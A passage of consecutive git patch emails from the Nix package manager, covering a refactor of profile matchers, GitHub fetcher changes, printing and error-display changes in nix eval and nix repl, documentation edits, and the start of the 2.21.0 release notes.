-        .matches = [reg](const std::string &name, const ProfileElement & element) {
-            return std::regex_match(element.identifier(), reg);
-        },
-    };
-}
+    std::regex regex;
+    std::string pattern;
 
-Matcher createStorePathMatcher(const nix::StorePath & storePath)
+    RegexMatcher(const std::string & pattern) : regex(pattern, std::regex::extended | std::regex::icase), pattern(pattern)
+    { }
+
+    std::string getTitle() override
+    {
+        return fmt("Regex '%s'", pattern);
+    }
+
+    bool matches(const std::string & name, const ProfileElement & element) override
+    {
+        return std::regex_match(element.identifier(), regex);
+    }
+};
+
+struct StorePathMatcher : public Matcher
 {
-    return {
-        .type = MatcherType::StorePath,
-        .title = fmt("Store path '%s'", storePath.to_string()),
-        .matches = [storePath](const std::string &name, const ProfileElement & element) {
-            return element.storePaths.count(storePath);
-        }
-    };
-}
+    nix::StorePath storePath;
 
-Matcher createNameMatcher(const std::string & name) {
-    return {
-        .type = MatcherType::Name,
-        .title = fmt("Package name '%s'", name),
-        .matches = [name](const std::string &elementName, const ProfileElement & element) {
-            return elementName == name;
-        }
-    };
-}
+    StorePathMatcher(const nix::StorePath & storePath) : storePath(storePath)
+    { }
 
-Matcher all = {
-    .type = MatcherType::All,
-    .title = "--all",
-    .matches = [](const std::string &name, const ProfileElement & element) {
+    std::string getTitle() override
+    {
+        return fmt("Store path '%s'", storePath.to_string());
+    }
+
+    bool matches(const std::string & name, const ProfileElement & element) override
+    {
+        return element.storePaths.count(storePath);
+    }
+};
+
+struct NameMatcher : public Matcher
+{
+    std::string name;
+
+    NameMatcher(const std::string & name) : name(name)
+    { }
+
+    std::string getTitle() override
+    {
+        return fmt("Package name '%s'", name);
+    }
+
+    bool matches(const std::string & name, const ProfileElement & element) override
+    {
+        return name == this->name;
+    }
+};
+
+struct AllMatcher : public Matcher
+{
+    std::string getTitle() override
+    {
+        return "--all";
+    }
+
+    bool matches(const std::string & name, const ProfileElement & element) override
+    {
         return true;
     }
 };
 
+AllMatcher all;
+
 class MixProfileElementMatchers : virtual Args, virtual StoreCommand
 {
-    std::vector _matchers;
+    std::vector> _matchers;
 
 public:
 
@@ -521,7 +541,7 @@ public:
             .longName = "all",
             .description = "Match all packages in the profile.",
             .handler = {[this]() {
-                _matchers.push_back(all);
+                _matchers.push_back(ref(std::shared_ptr(&all, [](AllMatcher*) {})));
             }},
         });
         addFlag({
@@ -529,7 +549,7 @@ public:
             .description = "A regular expression to match one or more packages in the profile.",
             .labels = {"pattern"},
             .handler = {[this](std::string arg) {
-                _matchers.push_back(createRegexMatcher(arg));
+                _matchers.push_back(make_ref(arg));
             }},
         });
         expectArgs({
@@ -540,9 +560,9 @@ public:
                     if (auto n = string2Int(arg)) {
                         throw Error("'nix profile' no longer supports indices ('%d')", *n);
                     } else if (getStore()->isStorePath(arg)) {
-                        _matchers.push_back(createStorePathMatcher(getStore()->parseStorePath(arg)));
+                        _matchers.push_back(make_ref(getStore()->parseStorePath(arg)));
                     } else {
-                        _matchers.push_back(createNameMatcher(arg));
+                        _matchers.push_back(make_ref(arg));
                     }
                 }
             }}
@@ -554,7 +574,7 @@ public:
             throw UsageError("No packages specified.");
         }
 
-        if (std::find_if(_matchers.begin(), _matchers.end(), [](const Matcher & m) { return m.type == MatcherType::All; }) != _matchers.end() && _matchers.size() > 1) {
+        if (std::find_if(_matchers.begin(), _matchers.end(), [](const ref & m) { return m.dynamic_pointer_cast(); }) != _matchers.end() && _matchers.size() > 1) {
             throw UsageError("--all cannot be used with package names or regular expressions.");
         }
 
@@ -567,13 +587,13 @@ public:
         for (auto & matcher : _matchers) {
             bool foundMatch = false;
             for (auto & [name, element] : manifest.elements) {
-                if (matcher.matches(name, element)) {
+                if (matcher->matches(name, element)) {
                     result.insert(name);
                     foundMatch = true;
                 }
             }
             if (!foundMatch) {
-                warn("%s does not match any packages in the profile.", matcher.title);
+                warn("%s does not match any packages in the profile.", matcher->getTitle());
             }
         }
         return result;

From 6d245182e8900ad86cf767108289afc879293e8c Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Fri, 8 Mar 2024 12:40:14 +0100
Subject: [PATCH 600/654] GitHub fetcher: Don't emit treeHash yet

But do accept it if it's there, so we don't choke on future lock files
that do have the treeHash attribute.
---
 src/libfetchers/github.cc | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/src/libfetchers/github.cc b/src/libfetchers/github.cc
index d9d348756..1ca639419 100644
--- a/src/libfetchers/github.cc
+++ b/src/libfetchers/github.cc
@@ -111,6 +111,7 @@ struct GitArchiveInputScheme : InputScheme
             "narHash",
             "lastModified",
             "host",
+            "treeHash",
         };
     }
 
@@ -268,7 +269,9 @@ struct GitArchiveInputScheme : InputScheme
     {
         auto [input, tarballInfo] = downloadArchive(store, _input);
 
+        #if 0
         input.attrs.insert_or_assign("treeHash", tarballInfo.treeHash.gitRev());
+        #endif
         input.attrs.insert_or_assign("lastModified", uint64_t(tarballInfo.lastModified));
 
         auto accessor = getTarballCache()->getAccessor(tarballInfo.treeHash, false);

From 1ffcbddf62824475257da2e58b2047e87f5287c8 Mon Sep 17 00:00:00 2001
From: Jonathan Dickinson 
Date: Fri, 8 Mar 2024 09:24:44 -0500
Subject: [PATCH 601/654] docs: add inherit to language overview (#10194)

* docs: add inherit to language overview

Adds a short summary about `inherit` to the language overview.
---
 doc/manual/src/language/index.md | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)

diff --git a/doc/manual/src/language/index.md b/doc/manual/src/language/index.md
index a26e43a05..5388c6dc4 100644
--- a/doc/manual/src/language/index.md
+++ b/doc/manual/src/language/index.md
@@ -432,6 +432,32 @@ This is an incomplete overview of language features, by example.
 
   
  
+ 
+  
+
+   `inherit pkgs src;`
+
+  
+  
+
+   Adds the variables to the current scope (attribute set or `let` binding).
+   Desugars to `pkgs = pkgs; src = src;`
+
+  
+ 
+ 
+  
+
+   `inherit (pkgs) lib stdenv;`
+
+  
+  
+
+   Adds the attributes, from the attribute set in parentheses, to the current scope (attribute set or `let` binding).
+   Desugars to `lib = pkgs.lib; stdenv = pkgs.stdenv;`
+
+  
+ 
  
   
 

From 35f2b07668f1ef7e62d16fe702278ad3115c22dd Mon Sep 17 00:00:00 2001
From: Felix Uhl 
Date: Fri, 8 Mar 2024 20:03:31 +0100
Subject: [PATCH 602/654] docs: Fix link to release note documentation

---
 CONTRIBUTING.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index a0c2b16f4..887bd4802 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -67,7 +67,7 @@ Check out the [security policy](https://github.com/NixOS/nix/security/policy).
    - [ ] API documentation in header files
    - [ ] Code and comments are self-explanatory
    - [ ] Commit message explains **why** the change was made
-   - [ ] New feature or incompatible change: updated [release notes](./doc/manual/src/release-notes/rl-next.md)
+   - [ ] New feature or incompatible change: [add a release note](https://nixos.org/manual/nix/stable/contributing/hacking#add-a-release-note)
 
 7. If you need additional feedback or help to getting pull request into shape, ask other contributors using [@mentions](https://docs.github.com/en/get-started/writing-on-github/getting-started-with-writing-and-formatting-on-github/basic-writing-and-formatting-syntax#mentioning-people-and-teams).
 

From 4910d74086a85876e093136a0e8ebc547b467af7 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Fri, 8 Mar 2024 21:43:54 -0800
Subject: [PATCH 603/654] Print derivation paths in `nix eval`

`nix eval` forces values and prints derivations as attribute sets, so
commands that print derivations (e.g. `nix eval nixpkgs#bash`) will
infinitely loop and segfault.

Printing derivations as `.drv` paths makes `nix eval` complete as
expected. Further work is needed, but this is better than a segfault.
---
 src/nix/eval.cc | 13 +++++++++++--
 1 file changed, 11 insertions(+), 2 deletions(-)

diff --git a/src/nix/eval.cc b/src/nix/eval.cc
index 2044c8c2b..088be3b17 100644
--- a/src/nix/eval.cc
+++ b/src/nix/eval.cc
@@ -120,8 +120,17 @@ struct CmdEval : MixJSON, InstallableValueCommand, MixReadOnlyOption
         }
 
         else {
-            state->forceValueDeep(*v);
-            logger->cout("%s", ValuePrinter(*state, *v, PrintOptions { .force = true }));
+            logger->cout(
+                "%s",
+                ValuePrinter(
+                    *state,
+                    *v,
+                    PrintOptions {
+                        .force = true,
+                        .derivationPaths = true
+                    }
+                )
+            );
         }
     }
 };

From ac730622e81336f42961cebea0f69bc637127ea4 Mon Sep 17 00:00:00 2001
From: Valentin Gagarin 
Date: Sat, 9 Mar 2024 18:57:57 +0100
Subject: [PATCH 604/654] document where the value of `builtins.nixPath` comes
 from (#9113)

* document default values for `nix-path`

also note how it's overridden and note the effect of `restrict-eval`
---
 src/libexpr/eval-settings.hh | 23 +++++++++++++++++------
 src/libexpr/primops.cc       |  8 +++-----
 2 files changed, 20 insertions(+), 11 deletions(-)

diff --git a/src/libexpr/eval-settings.hh b/src/libexpr/eval-settings.hh
index b5783d28f..c5581b9ff 100644
--- a/src/libexpr/eval-settings.hh
+++ b/src/libexpr/eval-settings.hh
@@ -21,11 +21,24 @@ struct EvalSettings : Config
     Setting nixPath{
         this, getDefaultNixPath(), "nix-path",
         R"(
-          List of directories to be searched for `<...>` file references
+          List of search paths to use for [lookup path](@docroot@/language/constructs/lookup-path.md) resolution.
+          This setting determines the value of
+          [`builtins.nixPath`](@docroot@/language/builtin-constants.md#builtins-nixPath) and can be used with [`builtins.findFile`](@docroot@/language/builtin-constants.md#builtins-findFile).
 
-          In particular, outside of [pure evaluation mode](#conf-pure-eval), this determines the value of
-          [`builtins.nixPath`](@docroot@/language/builtin-constants.md#builtins-nixPath).
-        )"};
+          The default value is
+
+          ```
+          $HOME/.nix-defexpr/channels
+          nixpkgs=$NIX_STATE_DIR/profiles/per-user/root/channels/nixpkgs
+          $NIX_STATE_DIR/profiles/per-user/root/channels
+          ```
+
+          It can be overridden with the [`NIX_PATH` environment variable](@docroot@/command-ref/env-common.md#env-NIX_PATH) or the [`-I` command line option](@docroot@/command-ref/opt-common.md#opt-I).
+
+          > **Note**
+          >
+          > If [pure evaluation](#conf-pure-eval) is enabled, `nixPath` evaluates to the empty list `[ ]`.
+        )", {}, false};
 
     Setting currentSystem{
         this, "", "eval-system",
@@ -55,8 +68,6 @@ struct EvalSettings : Config
           [`builtins.nixPath`](@docroot@/language/builtin-constants.md#builtins-nixPath),
           or to URIs outside of
           [`allowed-uris`](@docroot@/command-ref/conf-file.md#conf-allowed-uris).
-
-          Also the default value for [`nix-path`](#conf-nix-path) is ignored, such that only explicitly set search path entries are taken into account.
         )"};
 
     Setting pureEval{this, false, "pure-eval",
diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index a7687fa06..bc2a70496 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -1736,7 +1736,7 @@ static RegisterPrimOp primop_findFile(PrimOp {
       - If the suffix is found inside that directory, then the entry is a match.
         The combined absolute path of the directory (now downloaded if need be) and the suffix is returned.
 
-      [Lookup path](@docroot@/language/constructs/lookup-path.md) expressions can be [desugared](https://en.wikipedia.org/wiki/Syntactic_sugar) using this and [`builtins.nixPath`](@docroot@/language/builtin-constants.md#builtins-nixPath):
+      [Lookup path](@docroot@/language/constructs/lookup-path.md) expressions are [desugared](https://en.wikipedia.org/wiki/Syntactic_sugar) using this and [`builtins.nixPath`](@docroot@/language/builtin-constants.md#builtins-nixPath):
 
       ```nix
       
@@ -4570,11 +4570,9 @@ void EvalState::createBaseEnv()
     addConstant("__nixPath", v, {
         .type = nList,
         .doc = R"(
-          List of search path entries used to resolve [lookup paths](@docroot@/language/constructs/lookup-path.md).
+          The value of the [`nix-path` configuration setting](@docroot@/command-ref/conf-file.md#conf-nix-path): a list of search path entries used to resolve [lookup paths](@docroot@/language/constructs/lookup-path.md).
 
-          Lookup path expressions can be
-          [desugared](https://en.wikipedia.org/wiki/Syntactic_sugar)
-          using this and
+          Lookup path expressions are [desugared](https://en.wikipedia.org/wiki/Syntactic_sugar) using this and
           [`builtins.findFile`](./builtins.html#builtins-findFile):
 
           ```nix

From ea8faf8e9ada8513fe10afdc1f369e0dc6d4dce5 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Sat, 9 Mar 2024 15:57:29 -0800
Subject: [PATCH 605/654] Replace `foo` with `__NIX_STR` in `cxx-big-literal`

Looks a little nicer when you check the generated sources.
---
 mk/cxx-big-literal.mk | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/mk/cxx-big-literal.mk b/mk/cxx-big-literal.mk
index 85365df8e..d64a171c8 100644
--- a/mk/cxx-big-literal.mk
+++ b/mk/cxx-big-literal.mk
@@ -1,5 +1,5 @@
 %.gen.hh: %
-	@echo 'R"foo(' >> $@.tmp
+	@echo 'R"__NIX_STR(' >> $@.tmp
 	$(trace-gen) cat $< >> $@.tmp
-	@echo ')foo"' >> $@.tmp
+	@echo ')__NIX_STR"' >> $@.tmp
 	@mv $@.tmp $@

From 70e93c1e2b36d14dbd06524b73c864e3e93a2710 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Sat, 9 Mar 2024 17:07:52 -0800
Subject: [PATCH 606/654] Make `Matcher` subclasses `final`

Fixes this very long warning, which I'll only include the first line of:

/nix/store/8wrjhrycpshhc3b41xmjwvgqr2m3yajq-libcxx-16.0.6-dev/include/c++/v1/__memory/construct_at.h:66:5: warning: destructor called on non-final 'RegexMatcher' that has virtual functions but non-virtual destructor [-Wdelete-non-abstract-non-virtual-dtor]
    __loc->~_Tp();
---
 src/nix/profile.cc | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index b5ffc7cc6..c0f805794 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -485,7 +485,7 @@ struct Matcher
     virtual bool matches(const std::string & name, const ProfileElement & element) = 0;
 };
 
-struct RegexMatcher : public Matcher
+struct RegexMatcher final : public Matcher
 {
     std::regex regex;
     std::string pattern;
@@ -504,7 +504,7 @@ struct RegexMatcher : public Matcher
     }
 };
 
-struct StorePathMatcher : public Matcher
+struct StorePathMatcher final : public Matcher
 {
     nix::StorePath storePath;
 
@@ -522,7 +522,7 @@ struct StorePathMatcher : public Matcher
     }
 };
 
-struct NameMatcher : public Matcher
+struct NameMatcher final : public Matcher
 {
     std::string name;
 
@@ -540,7 +540,7 @@ struct NameMatcher : public Matcher
     }
 };
 
-struct AllMatcher : public Matcher
+struct AllMatcher final : public Matcher
 {
     std::string getTitle() override
     {

From d859d6c4341cfc735e3c373a777ee512f800817a Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Sat, 9 Mar 2024 18:13:08 -0800
Subject: [PATCH 607/654] `:print` strings directly in `nix repl`

Strings are now printed directly when evaluated by `:print`, rather than
escaped. This makes it easier to debug multi-line strings or strings
containing quotes, like the results of `builtins.readFile`,
`lib.toShellArg`, and so on.

```
nix-repl> "cuppy\ndog\ncity"
"cuppy\ndog\ncity"

nix-repl> :p "cuppy\ndog\ncity"
cuppy
dog
city
```
---
 src/libcmd/repl.cc | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc
index 75f20d635..1a93a54fe 100644
--- a/src/libcmd/repl.cc
+++ b/src/libcmd/repl.cc
@@ -542,6 +542,7 @@ ProcessLineResult NixRepl::processLine(std::string line)
              << "  :l, :load              Load Nix expression and add it to scope\n"
              << "  :lf, :load-flake        Load Nix flake and add it to scope\n"
              << "  :p, :print             Evaluate and print expression recursively\n"
+             << "                               Strings are printed directly, without escaping.\n"
              << "  :q, :quit                    Exit nix-repl\n"
              << "  :r, :reload                  Reload all files\n"
              << "  :sh                    Build dependencies of derivation, then start\n"
@@ -749,7 +750,11 @@ ProcessLineResult NixRepl::processLine(std::string line)
     else if (command == ":p" || command == ":print") {
         Value v;
         evalString(arg, v);
-        printValue(std::cout, v);
+        if (v.type() == nString) {
+            std::cout << v.string_view();
+        } else {
+            printValue(std::cout, v);
+        }
         std::cout << std::endl;
     }
 

From d13c63afa2b7b83de65d353918d4341e9e31e640 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Sat, 9 Mar 2024 18:28:04 -0800
Subject: [PATCH 608/654] Print top-level errors normally in `nix repl`
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Previously, errors while printing values in `nix repl` would be printed
in `«error: ...»` brackets rather than displayed normally:

```
nix-repl> legacyPackages.aarch64-darwin.pythonPackages.APScheduler
«error: Package ‘python-2.7.18.7’ in /nix/store/6s0m1qc31zw3l3kq0q4wd5cp3lqpkq0q-source/pkgs/development/interpreters/python/cpython/2.7/default.nix:335 is marked as insecure, refusing to evaluate.»
```

Now, errors will be displayed normally if they're emitted at the
top-level of an expression:

```
nix-repl> legacyPackages.aarch64-darwin.pythonPackages.APScheduler
error:
       … in the condition of the assert statement
         at /nix/store/6s0m1qc31zw3l3kq0q4wd5cp3lqpkq0q-source/lib/customisation.nix:268:17:
          267|     in commonAttrs // {
          268|       drvPath = assert condition; drv.drvPath;
             |                 ^
          269|       outPath = assert condition; drv.outPath;

       … in the left operand of the OR (||) operator
         at /nix/store/6s0m1qc31zw3l3kq0q4wd5cp3lqpkq0q-source/pkgs/development/interpreters/python/passthrufun.nix:28:45:
           27|         if lib.isDerivation value then
           28|           lib.extendDerivation (valid value || throw "${name} should use `buildPythonPackage` or `toPythonModule` if it is to be part of the Python packages set.") {} value
             |                                             ^
           29|         else

       (stack trace truncated; use '--show-trace' to show the full trace)

       error: Package ‘python-2.7.18.7’ in /nix/store/6s0m1qc31zw3l3kq0q4wd5cp3lqpkq0q-source/pkgs/development/interpreters/python/cpython/2.7/default.nix:335 is marked as insecure, refusing to evaluate.
```

Errors emitted in nested structures (like e.g. when printing `nixpkgs`)
will still be printed in brackets.
---
 src/libcmd/repl.cc           |   3 +-
 src/libexpr/print-options.hh |  30 ++++++++-
 src/libexpr/print.cc         | 120 +++++++++++++++++------------------
 3 files changed, 91 insertions(+), 62 deletions(-)

diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc
index 75f20d635..fce7b1a73 100644
--- a/src/libcmd/repl.cc
+++ b/src/libcmd/repl.cc
@@ -123,7 +123,8 @@ struct NixRepl
             .force = true,
             .derivationPaths = true,
             .maxDepth = maxDepth,
-            .prettyIndent = 2
+            .prettyIndent = 2,
+            .errors = ErrorPrintBehavior::ThrowTopLevel,
         });
     }
 };
diff --git a/src/libexpr/print-options.hh b/src/libexpr/print-options.hh
index 6c5e80c61..080ba26b8 100644
--- a/src/libexpr/print-options.hh
+++ b/src/libexpr/print-options.hh
@@ -8,6 +8,29 @@
 
 namespace nix {
 
+/**
+ * How errors should be handled when printing values.
+ */
+enum class ErrorPrintBehavior {
+    /**
+     * Print the first line of the error in brackets: `«error: oh no!»`
+     */
+    Print,
+    /**
+     * Throw the error to the code that attempted to print the value, instead
+     * of suppressing it.
+     */
+    Throw,
+    /**
+     * Only throw the error if encountered at the top level of the expression.
+     *
+     * This will cause expressions like `builtins.throw "uh oh!"` to throw
+     * errors, but will print attribute sets and other nested structures
+     * containing values that error (like `nixpkgs`) normally.
+     */
+    ThrowTopLevel,
+};
+
 /**
  * Options for printing Nix values.
  */
@@ -68,6 +91,11 @@ struct PrintOptions
      */
     size_t prettyIndent = 0;
 
+    /**
+     * How to handle errors encountered while printing values.
+     */
+    ErrorPrintBehavior errors = ErrorPrintBehavior::Print;
+
     /**
      * True if pretty-printing is enabled.
      */
@@ -86,7 +114,7 @@ static PrintOptions errorPrintOptions = PrintOptions {
     .maxDepth = 10,
     .maxAttrs = 10,
     .maxListItems = 10,
-    .maxStringLength = 1024
+    .maxStringLength = 1024,
 };
 
 }
diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc
index 9d280f623..f67e94750 100644
--- a/src/libexpr/print.cc
+++ b/src/libexpr/print.cc
@@ -271,25 +271,21 @@ private:
 
     void printDerivation(Value & v)
     {
-        try {
-            Bindings::iterator i = v.attrs->find(state.sDrvPath);
-            NixStringContext context;
-            std::string storePath;
-            if (i != v.attrs->end())
-                storePath = state.store->printStorePath(state.coerceToStorePath(i->pos, *i->value, context, "while evaluating the drvPath of a derivation"));
+        Bindings::iterator i = v.attrs->find(state.sDrvPath);
+        NixStringContext context;
+        std::string storePath;
+        if (i != v.attrs->end())
+            storePath = state.store->printStorePath(state.coerceToStorePath(i->pos, *i->value, context, "while evaluating the drvPath of a derivation"));
 
-            if (options.ansiColors)
-                output << ANSI_GREEN;
-            output << "«derivation";
-            if (!storePath.empty()) {
-                output << " " << storePath;
-            }
-            output << "»";
-            if (options.ansiColors)
-                output << ANSI_NORMAL;
-        } catch (Error & e) {
-            printError_(e);
+        if (options.ansiColors)
+            output << ANSI_GREEN;
+        output << "«derivation";
+        if (!storePath.empty()) {
+            output << " " << storePath;
         }
+        output << "»";
+        if (options.ansiColors)
+            output << ANSI_NORMAL;
     }
 
     bool shouldPrettyPrintAttrs(AttrVec & v)
@@ -510,64 +506,68 @@ private:
         output.flush();
         checkInterrupt();
 
-        if (options.force) {
-            try {
+        try {
+            if (options.force) {
                 state.forceValue(v, v.determinePos(noPos));
-            } catch (Error & e) {
-                printError_(e);
-                return;
             }
-        }
 
-        switch (v.type()) {
+            switch (v.type()) {
 
-        case nInt:
-            printInt(v);
-            break;
+            case nInt:
+                printInt(v);
+                break;
 
-        case nFloat:
-            printFloat(v);
-            break;
+            case nFloat:
+                printFloat(v);
+                break;
 
-        case nBool:
-            printBool(v);
-            break;
+            case nBool:
+                printBool(v);
+                break;
 
-        case nString:
-            printString(v);
-            break;
+            case nString:
+                printString(v);
+                break;
 
-        case nPath:
-            printPath(v);
-            break;
+            case nPath:
+                printPath(v);
+                break;
 
-        case nNull:
-            printNull();
-            break;
+            case nNull:
+                printNull();
+                break;
 
-        case nAttrs:
-            printAttrs(v, depth);
-            break;
+            case nAttrs:
+                printAttrs(v, depth);
+                break;
 
-        case nList:
-            printList(v, depth);
-            break;
+            case nList:
+                printList(v, depth);
+                break;
 
-        case nFunction:
-            printFunction(v);
-            break;
+            case nFunction:
+                printFunction(v);
+                break;
 
-        case nThunk:
-            printThunk(v);
-            break;
+            case nThunk:
+                printThunk(v);
+                break;
 
-        case nExternal:
-            printExternal(v);
-            break;
+            case nExternal:
+                printExternal(v);
+                break;
 
-        default:
-            printUnknown();
-            break;
+            default:
+                printUnknown();
+                break;
+            }
+        } catch (Error & e) {
+            if (options.errors == ErrorPrintBehavior::Throw
+                || (options.errors == ErrorPrintBehavior::ThrowTopLevel
+                    && depth == 0)) {
+                throw;
+            }
+            printError_(e);
         }
     }
 

From c1811c1eba8f6ebfecfd15ff2ec622911b7aeae9 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Sun, 10 Mar 2024 13:38:38 +0100
Subject: [PATCH 609/654] Fix GitHub test

Cherry-picked from 03618bb85f609a9b2f3cd6b82628a95b425e3b72.
---
 tests/nixos/github-flakes.nix | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/tests/nixos/github-flakes.nix b/tests/nixos/github-flakes.nix
index a51689445..6f8a5b9d8 100644
--- a/tests/nixos/github-flakes.nix
+++ b/tests/nixos/github-flakes.nix
@@ -58,7 +58,7 @@ let
       mkdir -p $out/{commits,tarball}
 
       # Setup https://docs.github.com/en/rest/commits/commits#get-a-commit
-      echo '{"sha": "${private-flake-rev}"}' > $out/commits/HEAD
+      echo '{"sha": "${private-flake-rev}", "commit": {"tree": {"sha": "ffffffffffffffffffffffffffffffffffffffff"}}}' > $out/commits/HEAD
 
       # Setup tarball download via API
       dir=private-flake
@@ -72,7 +72,7 @@ let
       mkdir -p $out/commits
 
       # Setup https://docs.github.com/en/rest/commits/commits#get-a-commit
-      echo '{"sha": "${nixpkgs.rev}"}' > $out/commits/HEAD
+      echo '{"sha": "${nixpkgs.rev}", "commit": {"tree": {"sha": "ffffffffffffffffffffffffffffffffffffffff"}}}' > $out/commits/HEAD
     '';
 
   archive = pkgs.runCommand "nixpkgs-flake" {}

From 841fd78baac507b1e97921afa3c2ebaeb6c65bfd Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Sun, 10 Mar 2024 13:56:53 +0100
Subject: [PATCH 610/654] GitArchiveInputScheme: Support the narHash attribute

This is required to produce a locked flakeref.
---
 src/libfetchers/github.cc | 9 ++++++++-
 1 file changed, 8 insertions(+), 1 deletion(-)

diff --git a/src/libfetchers/github.cc b/src/libfetchers/github.cc
index 1ca639419..8100afe4d 100644
--- a/src/libfetchers/github.cc
+++ b/src/libfetchers/github.cc
@@ -98,6 +98,10 @@ struct GitArchiveInputScheme : InputScheme
         if (ref) input.attrs.insert_or_assign("ref", *ref);
         if (host_url) input.attrs.insert_or_assign("host", *host_url);
 
+        auto narHash = url.query.find("narHash");
+        if (narHash != url.query.end())
+            input.attrs.insert_or_assign("narHash", narHash->second);
+
         return input;
     }
 
@@ -135,10 +139,13 @@ struct GitArchiveInputScheme : InputScheme
         assert(!(ref && rev));
         if (ref) path += "/" + *ref;
         if (rev) path += "/" + rev->to_string(HashFormat::Base16, false);
-        return ParsedURL {
+        auto url = ParsedURL {
             .scheme = std::string { schemeName() },
             .path = path,
         };
+        if (auto narHash = input.getNarHash())
+            url.query.insert_or_assign("narHash", narHash->to_string(HashFormat::SRI, true));
+        return url;
     }
 
     Input applyOverrides(

From db9bab2708d8a44067156da686dbaf7604f4bc47 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Sun, 10 Mar 2024 12:56:07 -0700
Subject: [PATCH 611/654] `Matcher`: Add virtual destructor

---
 src/nix/profile.cc | 1 +
 1 file changed, 1 insertion(+)

diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index c0f805794..a5a40e4f6 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -481,6 +481,7 @@ struct CmdProfileInstall : InstallablesCommand, MixDefaultProfile
 
 struct Matcher
 {
+    virtual ~Matcher() { }
     virtual std::string getTitle() = 0;
     virtual bool matches(const std::string & name, const ProfileElement & element) = 0;
 };

From 74008d82159b281a9d095a73a39189b8648068e9 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Mon, 11 Mar 2024 15:34:23 +0100
Subject: [PATCH 612/654] Run preInstallCheck even when not building

Add `runHook preInstallCheck` to the overridden `installCheckPhase` used
for the non-build case.

In particular, this allow the fix from 2a3451077677787eae176c72717817ba80738a5e
to also apply there.
---
 package.nix | 1 +
 1 file changed, 1 insertion(+)

diff --git a/package.nix b/package.nix
index fa898e906..7d9a39771 100644
--- a/package.nix
+++ b/package.nix
@@ -343,6 +343,7 @@ in {
 
   # Work around weird bug where it doesn't think there is a Makefile.
   installCheckPhase = if (!doBuild && doInstallCheck) then ''
+    runHook preInstallCheck
     mkdir -p src/nix-channel
     make installcheck -j$NIX_BUILD_CORES -l$NIX_BUILD_CORES
   '' else null;

From b12dc76cfc9d6de0cdb1e34d43f1373a3b305772 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 11 Mar 2024 16:22:29 +0100
Subject: [PATCH 613/654] release notes: 2.21.0

---
 doc/manual/rl-next/arg-from-file.md           |   9 -
 .../rl-next/better-errors-in-nix-repl.md      |  40 --
 .../debugger-locals-for-let-expressions.md    |   9 -
 doc/manual/rl-next/debugger-on-trace.md       |   9 -
 doc/manual/rl-next/debugger-positions.md      |  25 --
 ...debugger-more-reliably-in-let-and-calls.md |  25 --
 doc/manual/rl-next/fod-sandbox-escape.md      |  14 -
 doc/manual/rl-next/forbid-nested-debuggers.md |  32 --
 doc/manual/rl-next/formal-order.md            |   7 -
 doc/manual/rl-next/inherit-error-positions.md |   6 -
 doc/manual/rl-next/inherit-from-by-need.md    |   7 -
 doc/manual/rl-next/lambda-printing.md         |  50 ---
 doc/manual/rl-next/leading-period.md          |  10 -
 .../rl-next/more-commands-respect-ctrl-c.md   |  13 -
 .../rl-next/pretty-print-in-nix-repl.md       |  24 --
 doc/manual/rl-next/profile-regex-all.md       |  35 --
 doc/manual/rl-next/reduce-debugger-clutter.md |  37 --
 .../rl-next/repl-ctrl-c-while-printing.md     |   8 -
 doc/manual/rl-next/repl-cycle-detection.md    |  22 --
 ...-location-in-while-evaluating-attribute.md |  23 --
 doc/manual/rl-next/stack-size-macos.md        |   9 -
 doc/manual/src/SUMMARY.md.in                  |   1 +
 doc/manual/src/release-notes/rl-2.21.md       | 366 ++++++++++++++++++
 23 files changed, 367 insertions(+), 414 deletions(-)
 delete mode 100644 doc/manual/rl-next/arg-from-file.md
 delete mode 100644 doc/manual/rl-next/better-errors-in-nix-repl.md
 delete mode 100644 doc/manual/rl-next/debugger-locals-for-let-expressions.md
 delete mode 100644 doc/manual/rl-next/debugger-on-trace.md
 delete mode 100644 doc/manual/rl-next/debugger-positions.md
 delete mode 100644 doc/manual/rl-next/enter-debugger-more-reliably-in-let-and-calls.md
 delete mode 100644 doc/manual/rl-next/fod-sandbox-escape.md
 delete mode 100644 doc/manual/rl-next/forbid-nested-debuggers.md
 delete mode 100644 doc/manual/rl-next/formal-order.md
 delete mode 100644 doc/manual/rl-next/inherit-error-positions.md
 delete mode 100644 doc/manual/rl-next/inherit-from-by-need.md
 delete mode 100644 doc/manual/rl-next/lambda-printing.md
 delete mode 100644 doc/manual/rl-next/leading-period.md
 delete mode 100644 doc/manual/rl-next/more-commands-respect-ctrl-c.md
 delete mode 100644 doc/manual/rl-next/pretty-print-in-nix-repl.md
 delete mode 100644 doc/manual/rl-next/profile-regex-all.md
